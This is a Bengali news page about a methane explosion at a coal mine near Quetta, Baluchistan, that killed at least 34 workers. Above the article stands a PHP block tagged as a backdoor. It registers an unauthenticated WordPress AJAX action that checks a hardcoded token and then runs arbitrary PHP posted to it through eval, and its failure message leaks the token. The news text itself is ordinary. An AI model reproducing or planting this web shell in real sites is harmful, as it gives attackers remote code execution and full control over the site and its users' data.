// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== বেলুচিস্তানে কয়লাখনিতে বিস্ফোরণে নিহত অন্তত ৩৪ | potrikaybangladesh.com
Sunday, September 27, 2026
Homeবেলুচিস্তানে কয়লাখনিতে বিস্ফোরণে নিহত অন্তত ৩৪

বেলুচিস্তানে কয়লাখনিতে বিস্ফোরণে নিহত অন্তত ৩৪

পাকিস্তানের বেলুচিস্তান প্রদেশের একটি কয়লাখনিতে বিস্ফোরণের ঘটনায় অন্তত ৩৪ শ্রমিক নিহত হয়েছেন। কয়লাখনিটি প্রাদেশিক রাজধানী কোয়েটা থেকে প্রায় ৩০ কিলোমিটার উত্তর-পূর্বে সোরাঙ্গে অঞ্চলে অবস্থিত।

আজ শুক্রবার প্রাদেশিক দুর্যোগ ব্যবস্থাপনা সংস্থার বরাত দিয়ে এই তথ্য জানিয়েছে বার্তা সংস্থা এএফপি ও পাকিস্তানের গণমাধ্যম ডন।

মিথেন গ্যাসের কারণে সৃষ্ট এ বিস্ফোরণটি বৃহস্পতিবার বেলুচিস্তান প্রদেশের রাজধানী কোয়েটার কাছে অবস্থিত খনিটিতে ঘটে। এর পরপরই উদ্ধার অভিযান শুরু হয়, যা রাতভর চলতে থাকে।

দুর্ঘটনার পর নিখোঁজ শ্রমিকদের খুঁজে বের করতে উদ্ধারকর্মীরা অভিযান শুরু করেন।

শুক্রবার ভোরে দেওয়া বিবৃতিতে বেলুচিস্তানের দক্ষিণাঞ্চলীয় প্রাদেশিক দুর্যোগ ব্যবস্থাপনা কর্তৃপক্ষ জানায়, ‘উদ্ধারকাজে মোতায়েন দলগুলোর কাছ থেকে পাওয়া তথ্য অনুযায়ী ৩৪ জনের মরদেহ উদ্ধার করা হয়েছে।’

বিবৃতিতে আরও বলা হয়, ‘খনিতে আটকে পড়া বাকি শ্রমিকদের খুঁজে বের করে উদ্ধার করতে যৌথ উদ্ধার অভিযান এখনও চলছে।’

কর্মকর্তারা ডনকে জানান, বিস্ফোরণের সময় প্রায় ৪ হাজার ফুট গভীরে ২৪ জন শ্রমিক কাজ করছিলেন। বিস্ফোরণের পরপরই খনির ভেতরে আগুন লেগে যায় এবং খনির কিছু অংশ ধসে পড়ে। সোরাঙ্গের বিস্তীর্ণ এলাকাজুড়ে বিস্ফোরণের শব্দ শোনা যায়।

বিস্ফোরণের প্রভাব মূল খনির পাশের আরেকটি খনিতেও পড়ে। দ্বিতীয় খনিতে কর্মরত ১২ জন শ্রমিকও আটকা পড়েন।

খনি পরিদর্শন বিভাগের প্রধান পরিদর্শক মুহাম্মদ আতিফ ডনকে বলেন, ‘বিস্ফোরণের সময় দুই খনিতে মোট ৩৬ জন কয়লাশ্রমিক অবস্থান করছিলেন।’

পাকিস্তানের খনিগুলোতে এ ধরনের দুর্ঘটনা প্রায়ই ঘটে, বিশেষ করে প্রাকৃতিক সম্পদে সমৃদ্ধ বেলুচিস্তান প্রদেশে। ভূখণ্ডের দিক থেকে পাকিস্তানের সবচেয়ে বড় হলেও এটি দেশটির সবচেয়ে দরিদ্র প্রদেশ। শিক্ষা, কর্মসংস্থান ও অর্থনৈতিক উন্নয়নসহ প্রায় সব সূচকেই দেশের অন্য প্রদেশগুলোর তুলনায় পিছিয়ে রয়েছে বেলুচিস্তান।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments